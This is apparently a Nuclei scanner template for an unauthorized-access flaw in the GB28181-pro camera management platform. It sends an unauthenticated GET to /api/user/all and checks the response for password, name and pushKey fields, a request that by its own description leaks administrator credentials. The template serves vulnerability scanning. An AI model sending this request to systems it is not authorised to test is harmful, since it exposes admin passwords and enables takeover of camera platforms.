http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - '"password":'
            - '"name":'
            - '"pushKey":'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /api/user/all HTTP/1.1
          Host: {{Hostname}}
id: GB28181-unauthorized
info:
    author: Superhero
    description: GB28181-pro开源物联网摄像头管理平台api/user存在未授权访问漏洞，攻击者可利用漏洞获取当前系统管理员用户名及密码进行登录系统。
    name: GB28181摄像头管理平台-user未授权访问
    severity: medium
    tags:
        - unauthorized
        - info
        - GB28181摄像头管理平台
